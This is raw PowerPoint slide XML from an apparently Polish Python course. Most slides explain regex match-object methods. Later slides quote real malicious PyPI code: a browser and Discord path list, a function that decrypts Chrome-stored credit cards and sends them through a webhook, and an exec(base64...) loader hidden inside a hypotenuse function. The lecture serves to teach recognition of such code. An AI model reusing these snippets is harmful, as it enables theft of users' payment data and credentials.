              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>discordptb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    'Google Chrome': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\Google\\Chrome\\User Data\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    'Opera': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>roaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\Opera Software\\Opera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Stable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Brave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>BraveSoftware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Brave-Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\\User Data\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Yandex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Yandex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>YandexBrowser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\\User Data\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:b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8187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8115E1-8D0E-4DEA-66C8-AFFD92AB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obiektów-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dopasowań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693CF4-8920-B28E-17E2-0EB00FDF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411524"/>
            <a:ext cx="11090274" cy="4897201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>expand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>) – zastępuje w stringu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> znaki specjalne takie jak \1 przez odpowiednie grupy, np.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>xx = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>re.compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(r"(\d\d\d\d)")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xx.search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("in the year 1999")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yy.expand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>r"Year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: \1")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    # Year: 1999</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>([group1, …]) zwraca dopasowania do grup o odpowiednich numerach</a:t>
            </a:r>
          </a:p>
          <a:p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D06168A-165F-E76B-36D7-01EBC04E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394" y="4255385"/>
            <a:ext cx="7699506" cy="266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35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8115E1-8D0E-4DEA-66C8-AFFD92AB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obiektów-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dopasowań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693CF4-8920-B28E-17E2-0EB00FDF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35424"/>
            <a:ext cx="11090274" cy="4897201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Metoda specjalna __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>getitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>__(g) pozwala korzystać z obiektów-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dopasowań</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> jak z obiektów indeksowanych (w ogólności zdefiniowanie metody __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>getitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>__(indeks) pozwala uczynić obiekt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>indeksowalnym</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>), np.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3C89F16-21C3-65B6-E495-392B7BD43FC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4868" y="3568662"/>
            <a:ext cx="10811708" cy="30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2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8115E1-8D0E-4DEA-66C8-AFFD92AB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obiektów-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dopasowań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693CF4-8920-B28E-17E2-0EB00FDF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35424"/>
            <a:ext cx="11090274" cy="4897201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> zwraca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>tuplę</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dopasowaniami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> do wszystkich grup po kolei</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>start([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>]) oraz end([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>]) zwracają indeks znaku w stringu oznaczający początek oraz koniec dopasowania (całości dopasowania lub danej grupy)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>popularny przykład użycia: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>m.string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>m.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(g):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>m.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(g)]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 err="1"/>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>]) dla obiektu m zwraca 2-tuplę </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>m.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(group), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>m.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(group))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0D45B81-B975-D555-799C-E857BBEAFC7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694" y="4114777"/>
            <a:ext cx="8605406" cy="183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35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8115E1-8D0E-4DEA-66C8-AFFD92AB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Atrybuty obiektów-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dopasowań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693CF4-8920-B28E-17E2-0EB00FDF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35424"/>
            <a:ext cx="11090274" cy="4897201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> oraz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>endpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – argumenty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> oraz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>endpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> podane podczas tworzenia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>lastindex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – numer ostatniej grupy (lub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>None</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> jeśli nie było grup)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>re – obiekt-wyrażenie które doprowadziło do powstania tego dopasowania</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>string – string podany podczas tworzenia (ten przeszukiwany)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2891843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143CA3-CEA7-726F-372A-E224C9C9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B26177-D45E-39E3-D6E9-92EC839E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https://docs.python.org/3/library/re.html#regular-expression-examples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03129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1381F0-FFB7-4632-91C0-3DDE953A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EB8920-2F7B-C31E-15B9-A544B2F43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https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=5604</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=10341</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://jfrog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-code/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8528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8BBA78-D0AE-4043-58E5-D52DBF1B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prawdziwie złośliwego kodu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96D397-79E5-C46F-199F-D2C14636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33525"/>
            <a:ext cx="11090274" cy="5257800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Szukanie danych karty kredytowej:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>():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master_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = master()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login_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>['USERPROFILE'] + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.sep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>r'AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\Google\Chrome\User Data\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\Web Data'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    shutil.copy2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>login_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>                 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>CCvault.db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>")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conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = sqlite3.connect("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>CCvault.db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>")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cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>conn.cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>()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try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/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>cursor.execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>("SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>credit_cards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>        for r in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>cursor.fetchall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = r[1]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>encrypted_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = r[4]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>decrypted_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>dpw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>encrypted_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>master_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>expire_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = r[2]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>expire_year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = r[3]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>hook.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>f"CARD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>-NAME: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>nNUMBER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>decrypted_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>nEXPIRY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> M: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>expire_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>) + "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>nEXPIRY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> Y: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>expire_year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>) + "\n" + "*" * 10 + "\n")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324860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8BBA78-D0AE-4043-58E5-D52DBF1B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Ukrywanie złośliwego kodu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96D397-79E5-C46F-199F-D2C14636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33525"/>
            <a:ext cx="11090274" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Podejrzana zawartość w kodzie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Pythona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> wygląda tak:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>import base64,sys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>def hello():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 err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3Qs...'))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>hypotenuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>a,b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>	hello()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>	c = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math.sqrt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math.pow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(a,2) + </a:t>
            </a:r>
            <a:r>
